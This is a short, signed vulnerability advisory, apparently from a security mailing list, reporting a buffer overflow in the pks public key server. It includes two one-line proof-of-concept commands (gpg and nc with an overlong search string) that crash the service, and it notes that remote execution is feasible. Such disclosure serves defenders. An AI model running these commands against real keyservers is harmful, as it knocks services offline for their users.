pks public key server DOS and remote execution

[Max <rusmir () tula net>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi there,

A popular pks public key server available from
http://www.mit.edu/people/marc/pks/pks.html
is vulnerable to buffer overflow attack.

A long enough (> 256b) search request will crash the service.

It is as simple as this:

gpg --search-keys `perl -e "print 'A'x512"`

or, without gpg,

echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc keyserver-host 11371

Fortunately (or unfortunately) in order to exploit remote execution, the
code should be isalnum() string and should be able to survive tolower()
conversion. But it is possible to write, especially for systems with
locales, where 0x80..0xff are printable characters.

Thanks,
Max.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE87sEN8mCpXsrcXpwRAiBoAJ9UjT7+XPoBJ0COO/W5gIHHFYmOygCgm80Y
oIAccr98kivYr2KsuF4SFzg=
=9quB
-----END PGP SIGNATURE-----